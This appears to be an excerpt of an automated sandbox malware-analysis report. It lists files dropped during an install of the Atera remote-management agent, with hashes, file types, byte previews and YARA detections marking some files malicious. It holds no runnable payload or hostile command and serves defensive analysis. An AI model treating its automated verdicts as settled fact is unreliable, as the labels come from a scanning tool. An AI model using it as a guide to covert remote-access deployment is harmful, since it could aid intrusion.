                                                                                                                                                                                                                                        C:\Windows\Installer\MSIC4E9.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSICBDF.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1727646036070802
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjWAGiLIlHVRpIh/7777777777777777777777777vDHFzTPrfWrl0i8Q:JMQI5wBTr/F
                                                                                                                                                                                                                                        MD5:FEEE5C384E33D438380685CF00999035
                                                                                                                                                                                                                                        SHA1:DC56FEE6BE134249861AFD01965ED74AE675A7CF
                                                                                                                                                                                                                                        SHA-256:AC433F6E3D658AD90F831D2918B0B84F67A6664C86EED0E173AE5FB7BD179D63
                                                                                                                                                                                                                                        SHA-512:7B08D4CEC0413BED4F48EA4298407FC1536D97D1BC0B273136F3286E1FF1A27B2AA1E4B4B1BF7733E7C582C652F89636ABAA74DBB6ACD6DA76745620FBA60211
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.177840323244185
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72Fj0AGiLIlHVRphh/7777777777777777777777777vDHFnwD7j6t/l0i8Q:JqQI51XiF
                                                                                                                                                                                                                                        MD5:2E0CCBE7E39285B631E12CB8F8D320F7
                                                                                                                                                                                                                                        SHA1:A5AFF7EE45D45FEB41739B6B9A1BC286CD92ED22
                                                                                                                                                                                                                                        SHA-256:4F012629024B02384701C4156821079BF423A5A08762F2B158D5D21071F18B95
                                                                                                                                                                                                                                        SHA-512:B346113249142C402CF6885B3DDB65FEA74A4B13D3E117B1E379E042B36D806D070E427C7E185AC711DEDE6D27D6EAC30D5E14DC59171E3D2DE7F5F2A1342902
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6215570221396338
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8PhPuRc06WXJEnT50DtqISoedvPdvbCnuhnq9fn0tOEBdStedvPdvxubS:thP1HnT6DwIciuBu/0tOG4
                                                                                                                                                                                                                                        MD5:9A3113EAC7D8A989BE1CE1E2070EE351
                                                                                                                                                                                                                                        SHA1:BDBF09D4E82A7A6705CD8CD3EC624F90AB966F3F
                                                                                                                                                                                                                                        SHA-256:3BDFCF83E100C2F53B17F21B5A49898E9F4418C2976F6A407B178E5F2A33527C
                                                                                                                                                                                                                                        SHA-512:7E6B5EA7D82954D5436D02EC5C700EAD2A4F15A8A212B2ED8C7E41C0A6C362373581B01F85644BF04367BE1247D4787A017A0315438D4992E7E6E6F297621AA6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):432220
                                                                                                                                                                                                                                        Entropy (8bit):5.375182689636752
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauJ:zTtbmkExhMJCIpEr+
                                                                                                                                                                                                                                        MD5:A02765267A3E266294B1E73F3735ECF8
                                                                                                                                                                                                                                        SHA1:B0445FD4FED75854AD6A21C4445EE18F57E0F92A
                                                                                                                                                                                                                                        SHA-256:248338F255660AD274EAE63D848D7ABB2B46E8E28CFC5F569430EDE2653FDFEA
                                                                                                                                                                                                                                        SHA-512:11F93C8D2D9D7031CE4BF9C8C5B25485547EC633CDAB0681798193D694D5CD4BA02644AF22715CEFE05CA7B7E336F4D1DC97574B1A58FDAA75F9A5C07A83502D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                                        Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                        MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                        SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                        SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                        SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                        C:\Windows\System32\InstallUtil.InstallLog

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704
                                                                                                                                                                                                                                        Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                        MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                        SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                        SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                        SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4761
                                                                                                                                                                                                                                        Entropy (8bit):7.945585251880973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                                                                                                                                                                                        MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                                                                                                                                                                                        SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                                                                                                                                                                                        SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                                                                                                                                                                                        SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):471
                                                                                                                                                                                                                                        Entropy (8bit):7.252336318369226
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:J0MgYPq9dUI5o7UmhVPqn1qqfuCUNfEnNWFzgAKi7XpKzIsVWpXjZO+CdDVIvX3n:JyYOdX5GLsHdBq7gLF/ZV0X3mh5aP
                                                                                                                                                                                                                                        MD5:D80438E1D2A0AABFB85F0320CC3FCDA9
                                                                                                                                                                                                                                        SHA1:E109B3A8B796156B33B44B0AF1260C4B33EA83DE
                                                                                                                                                                                                                                        SHA-256:CD97A00221FEE3183E6B16AEF73479CFFAC000A415BFE07755326F2ED21A78E5
                                                                                                                                                                                                                                        SHA-512:2CFCA1F287EE845EA20C60377D3E5F5C4D646BD997D03B2CC1858C99246CD3D327CD46883AB00A3930BE40B844398E57F5515002A633D78419AE2788CE75A8B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241216190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241216190516Z....20241223190516Z0...*.H...............H..l}i.^.+..e...3...Z.R.v.L.....]Z..S.%0%..gj....eh...G O.D....'E....S....^2\.j3 .....&[/....d.}.........0X.Z.9,..GD;..P..e.|... ..6}z.`........L...J.(......$...F@6.....I...#L.#.....{..E'z....V2%....,R+'.....w....P.xO......C_.j..}^..^..}.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.556681735949882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5o6Tq9Rc5h44TUqsqpEtIFl+MjZToAQSb47VyEbx+ncdRRMi/l225Rp2zaH6uO:5IcoqqmmMjZxQSb4gEbQncdRaY3p2zv
                                                                                                                                                                                                                                        MD5:11A01074C4A8BCE66E078C7946EE8203
                                                                                                                                                                                                                                        SHA1:C5C0FA95A146B150CB44F151B38BE009E37B7E38
                                                                                                                                                                                                                                        SHA-256:55567037B63D7B8A23814B5F220FBA748E4627AA38B01409CA584CE87649900C
                                                                                                                                                                                                                                        SHA-512:3F9FEA79DBF415CC095CA13836E955C1196A7C20263F743EC9D7BE121ACAD5B8C9C0A157738844145B90E399F5C1EEE00DE22ACB897F1839321B1F9DAD077FD7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241216213701Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...(I.x...#...R....20241216212102Z....20241223202102Z0...*.H..............=...%.)9Z....@b..V...].D.z!14..`....S..la....V.-...`..A..|.B.M.}...z.$.>Qs...M.....`..6..T...v...*.. ....}..._..m&4..6.._.Yb.F..F.7/....Q..B.p&...9.~......xS..[XP.].5`v.`.@.....m...,......../)5E.....S.q....5....].R..g.e....S6(..q......Z......2....N<=.6..{.....'ab.OyK...NcN.^.H..C...rm.mq..%r..Kz... ..U.)...E{.?.s/......5CL.V.)..[..|.\..$.,IW#.J...xO>B.....p.G..n...*..@..jf...a_;..QZ.}..XE.M.R....A7*}..R=..NIs:\.....4g.\aY.. ...prS.4..u1b.3/..4.kX.1.2J...}S`gy.......O..;...Gk......

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.563765755619064
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5onfZ5c5RlRtBfQzssPuxYVo7eZI4KYvRl1ZnMlpplv2yzwULUOkyIjBSrRvtMZH:5ivcdZcsmGWKURtsleK/2jB6vyZQoN
                                                                                                                                                                                                                                        MD5:7FA28022A5503D0807A43C64EC485D19
                                                                                                                                                                                                                                        SHA1:5984EAA8218BB297D44BC0CE3C4A5EB9E88861F7
                                                                                                                                                                                                                                        SHA-256:202789740A345B5741E75718F6295938F39001A9B25489E37D06BC67DED42D15
                                                                                                                                                                                                                                        SHA-512:C63FCF26A67E1C82695B67B31012CB5A6FC503627F4D3007D2F7ECE786B740585439A1DDE1E3324937E598686C4BD8476FA72F4D0E64615C0EADED37317514AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241216184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241216184215Z....20241223184215Z0...*.H.............*....l.......SE.r..U1[7v.hQ.n...dp... <J.G.....jZ"-....B^..F.h'..~.w..R.<j>...3s'.b.....s...v.[j.w.."Ck.4.+....Q..$..'..|..........~....p.:.......4.l.a....[.|c......e....[.FZ.z.;a..uV.j.. >.......ay. ..U"9...?y.>....5..9...d=..K!.c.K..v.r<qN1...&....2L...M.Q....X.TX.!..l.{...00>..L.h.........2..3....2..t.]lTi........=gQ....s.Y.u!P>e@._....!?...xC.\..$.cD~.l...H.p;.....w.F.u.*..X...7.j..z`Gm.Jc.e... hU...$.v.*..?....y.y.......M....-.z...aJW...@..L.[.y.......x.x.j8/.:..I.W...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

